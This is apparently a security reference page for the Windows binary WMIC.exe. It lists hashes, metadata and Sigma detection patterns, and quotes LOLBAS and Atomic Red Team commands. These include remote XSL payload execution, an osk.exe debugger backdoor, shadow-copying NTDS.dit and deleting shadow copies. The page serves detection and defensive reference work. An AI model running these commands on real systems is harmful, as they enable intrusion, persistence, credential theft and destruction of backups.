WMIC.exe
- File Path:
C:\windows\SysWOW64\wbem\WMIC.exe - Description: WMI Commandline Utility
Hashes
| Type | Hash |
|---|---|
| MD5 | C0EEC0815A343B93969777DE7EDCAA60 |
| SHA1 | 1D73D0DDB044D3FCE0BDCC4F9CE809788BC62885 |
| SHA256 | 42497534CDF28B26CE51A2DC26E5E5262E403CD512B725D47DF97B43A6FF21FB |
| SHA384 | FA631CE2189322DF092B9082524BAD4D1230EB5F354A2D19805B5BA6B1384078C2943328EAEA9C903C0D322865239048 |
| SHA512 | 9185AF2801E70386151DCF53B75AB2AFB5CE40925E7744DBC2E7799DCEF2C02C9FC827E6B2634804A2F0352666B98922A0AE62F6E8B0A1BBB1892A8827C13478 |
| SSDEEP | 6144:PbRIzRjVMXh7waxnU0X/wfwjA/dn4pDYGH5enhEPi:PbHxjX/QBN4RYGH0nhyi |
Signature
- Status: The file C:\windows\SysWOW64\wbem\WMIC.exe is not digitally signed. You cannot run this script on the current system. For more information about running scripts and setting execution policy, see about_Execution_Policies at http://go.microsoft.com/fwlink/?LinkID=135170
- Serial: ``
- Thumbprint: ``
- Issuer:
- Subject:
File Metadata
- Original Filename: wmic.exe.mui
- Product Name: Microsoft Windows Operating System
- Company Name: Microsoft Corporation
- File Version: 6.3.9600.16384 (winblue_rtm.130821-1623)
- Product Version: 6.3.9600.16384
- Language: English (United States)
- Legal Copyright: Microsoft Corporation. All rights reserved.
Possible Misuse
The following table contains possible examples of WMIC.exe being misused. While WMIC.exe is not inherently malicious, its legitimate functionality can be abused for malicious purposes.
| Source | Source File | Example | License |
|---|---|---|---|
| sigma | godmode_sigma_rule.yml | - '\wmic.exe' |
DRL 1.0 |
| sigma | win_susp_logon_explicit_credentials.yml | - '\wmic.exe' |
DRL 1.0 |
| sigma | sysmon_suspicious_remote_thread.yml | - '\wmic.exe' |
DRL 1.0 |
| sigma | file_event_win_win_shell_write_susp_directory.yml | - '\wmic.exe' # https://app.any.run/tasks/c903e9c8-0350-440c-8688-3881b556b8e0/ |
DRL 1.0 |
| sigma | image_load_suspicious_dbghelp_dbgcore_load.yml | - '\wmic.exe' |
DRL 1.0 |
| sigma | image_load_wmic_remote_xsl_scripting_dlls.yml | Image\|endswith: '\wmic.exe' |
DRL 1.0 |
| sigma | image_load_wmi_module_load.yml | - 'C:\Windows\System32\wbem\WMIC.exe' |
DRL 1.0 |
| sigma | proc_creation_win_bypass_squiblytwo.yml | - '\wmic.exe' |
DRL 1.0 |
| sigma | proc_creation_win_crime_maze_ransomware.yml | Image\|endswith: '\wmic.exe' |
DRL 1.0 |
| sigma | proc_creation_win_html_help_spawn.yml | - '\wmic.exe' |
DRL 1.0 |
| sigma | proc_creation_win_local_system_owner_account_discovery.yml | - Image\|endswith: '\wmic.exe' |
DRL 1.0 |
| sigma | proc_creation_win_mal_blue_mockingbird.yml | Image\|endswith: '\wmic.exe' |
DRL 1.0 |
| sigma | proc_creation_win_office_applications_spawning_wmi_commandline.yml | - Image: '\wbem\WMIC.exe' |
DRL 1.0 |
| sigma | proc_creation_win_office_applications_spawning_wmi_commandline.yml | - OriginalFileName: 'wmic.exe' |
DRL 1.0 |
| sigma | proc_creation_win_office_from_proxy_executing_regsvr32_payload.yml | - Image\|endswith: '\wbem\WMIC.exe' |
DRL 1.0 |
| sigma | proc_creation_win_office_from_proxy_executing_regsvr32_payload.yml | - OriginalFileName: 'wmic.exe' |
DRL 1.0 |
| sigma | proc_creation_win_office_from_proxy_executing_regsvr32_payload2.yml | - Image\|endswith: '\wbem\WMIC.exe' |
DRL 1.0 |
| sigma | proc_creation_win_office_shell.yml | - '\wmic.exe' # https://app.any.run/tasks/c903e9c8-0350-440c-8688-3881b556b8e0/ |
DRL 1.0 |
| sigma | proc_creation_win_office_spawning_wmi_commandline.yml | - Image\|endswith: '\wbem\WMIC.exe' |
DRL 1.0 |
| sigma | proc_creation_win_outlook_shell.yml | - '\wmic.exe' # https://app.any.run/tasks/c903e9c8-0350-440c-8688-3881b556b8e0/ |
DRL 1.0 |
| sigma | proc_creation_win_renamed_binary.yml | - 'wmic.exe' |
DRL 1.0 |
| sigma | proc_creation_win_renamed_binary.yml | - '\wmic.exe' |
DRL 1.0 |
| sigma | proc_creation_win_renamed_binary_highly_relevant.yml | - 'wmic.exe' |
DRL 1.0 |
| sigma | proc_creation_win_renamed_binary_highly_relevant.yml | - '\wmic.exe' |
DRL 1.0 |
| sigma | proc_creation_win_shadow_copies_creation.yml | - '\wmic.exe' |
DRL 1.0 |
| sigma | proc_creation_win_shadow_copies_deletion.yml | - '\wmic.exe' |
DRL 1.0 |
| sigma | proc_creation_win_suspicious_ad_reco.yml | Image\|endswith: '\wmic.exe' |
DRL 1.0 |
| sigma | proc_creation_win_susp_eventlog_clear.yml | Image\|endswith: '\wmic.exe' |
DRL 1.0 |
| sigma | proc_creation_win_susp_recon.yml | - '\WMIC.exe' |
DRL 1.0 |
| sigma | proc_creation_win_susp_servu_process_pattern.yml | - '\wmic.exe' # https://app.any.run/tasks/c903e9c8-0350-440c-8688-3881b556b8e0/ |
DRL 1.0 |
| sigma | proc_creation_win_susp_shell_spawn_by_java.yml | - '\wmic.exe' # https://app.any.run/tasks/c903e9c8-0350-440c-8688-3881b556b8e0/ |
DRL 1.0 |
| sigma | proc_creation_win_susp_shell_spawn_by_java_keytool.yml | - '\wmic.exe' |
DRL 1.0 |
| sigma | proc_creation_win_susp_spoolsv_child_processes.yml | - \wmic.exe |
DRL 1.0 |
| sigma | proc_creation_win_susp_wmi_execution.yml | Image\|endswith: '\wmic.exe' |
DRL 1.0 |
| sigma | proc_creation_win_webshell_detection.yml | Image\|endswith: '\wmic.exe' |
DRL 1.0 |
| sigma | proc_creation_win_wmic_reconnaissance.yml | Image\|endswith: \WMIC.exe |
DRL 1.0 |
| sigma | proc_creation_win_wmic_remote_service.yml | Image\|endswith: \WMIC.exe |
DRL 1.0 |
| sigma | proc_creation_win_wmic_remove_application.yml | Image\|endswith: \WMIC.exe |
DRL 1.0 |
| sigma | proc_creation_win_xsl_script_processing.yml | - Image\|endswith: '\wmic.exe' |
DRL 1.0 |
| sigma | proc_creation_win_xsl_script_processing.yml | - WMIC.exe FP depend on scripts and administrative methods used in the monitored environment. |
DRL 1.0 |
| LOLBAS | Wmic.yml | Name: Wmic.exe |
|
| LOLBAS | Wmic.yml | - Command: wmic.exe process call create "c:\ads\file.txt:program.exe" |
|
| LOLBAS | Wmic.yml | - Command: wmic.exe process call create calc |
|
| LOLBAS | Wmic.yml | - Command: wmic.exe process call create "C:\Windows\system32\reg.exe add \"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe\" /v \"Debugger\" /t REG_SZ /d \"cmd.exe\" /f" |
|
| LOLBAS | Wmic.yml | - Command: wmic.exe /node:"192.168.0.1" process call create "evil.exe" |
|
| LOLBAS | Wmic.yml | - Command: wmic.exe /node:REMOTECOMPUTERNAME PROCESS call create "at 9:00PM c:\GoogleUpdate.exe ^> c:\notGoogleUpdateResults.txt" |
|
| LOLBAS | Wmic.yml | - Command: wmic.exe /node:REMOTECOMPUTERNAME PROCESS call create "cmd /c vssadmin create shadow /for=C:\Windows\NTDS\NTDS.dit > c:\not_the_NTDS.dit" |
|
| LOLBAS | Wmic.yml | - Command: wmic.exe process get brief /format:"https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/Wmic_calc.xsl" |
|
| LOLBAS | Wmic.yml | - Command: wmic.exe process get brief /format:"\\127.0.0.1\c$\Tools\pocremote.xsl" |
|
| LOLBAS | Wmic.yml | - Path: C:\Windows\System32\wbem\wmic.exe |
|
| LOLBAS | Wmic.yml | - Path: C:\Windows\SysWOW64\wbem\wmic.exe |
|
| LOLBAS | Wmic.yml | - IOC: DotNet CLR libraries loaded into wmic.exe |
|
| LOLBAS | Wmic.yml | - IOC: DotNet CLR Usage Log - wmic.exe.log |
|
| atomic-red-team | T1047.md | This test uses wmic.exe to execute a process on the local host. | MIT License. © 2018 Red Canary |
| atomic-red-team | T1047.md | This test uses wmic.exe to execute a process on a remote host. Specify a valid value for remote IP using the node parameter. | MIT License. © 2018 Red Canary |
| atomic-red-team | T1047.md | This test uses wmic.exe to execute a DLL function using rundll32. Specify a valid value for remote IP using the node parameter. | MIT License. © 2018 Red Canary |
| atomic-red-team | T1069.001.md | Utilizing wmic.exe to enumerate groups on the local system. Upon execution, information will be displayed of local groups on system. | MIT License. © 2018 Red Canary |
| atomic-red-team | T1069.001.md | wmic.exe group get name | MIT License. © 2018 Red Canary |
| atomic-red-team | T1220.md | | wmic_command | WMI command to execute using wmic.exe | String | process list| | MIT License. © 2018 Red Canary |
| atomic-red-team | T1490.md | wmic.exe shadowcopy delete | MIT License. © 2018 Red Canary |
| atomic-red-team | T1518.001.md | wmic.exe /Namespace:\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List | MIT License. © 2018 Red Canary |
Additional Info*
*The information below is copied from MicrosoftDocs, which is maintained by Microsoft. Available under CC BY 4.0 license.
wmic
Displays WMI information inside an interactive command shell.
Syntax
wmic </parameter>
Sub-commands
The following sub-commands are available at all times:
| Sub-command | Description |
|---|---|
| class | Escapes from the default alias mode of WMIC to access classes in the WMI schema directly. |
| path | Escapes from the default alias mode of WMIC to access instances in the WMI schema directly. |
| context | Displays the current values of all global switches. |
| [quit | exit] | Exits the WMIC command shell. |
Examples
To display the current values of all global switches, type:
wmic context
Output similar to the following displays:
NAMESPACE : root\cimv2
ROLE : root\cli
NODE(S) : BOBENTERPRISE
IMPLEVEL : IMPERSONATE
[AUTHORITY : N/A]
AUTHLEVEL : PKTPRIVACY
LOCALE : ms_409
PRIVILEGES : ENABLE
TRACE : OFF
RECORD : N/A
INTERACTIVE : OFF
FAILFAST : OFF
OUTPUT : STDOUT
APPEND : STDOUT
USER : N/A
AGGREGATE : ON
To change the language ID used by the command line to English (locale ID 409), type:
wmic /locale:ms_409
Additional References
MIT License. Copyright (c) 2020-2021 Strontic.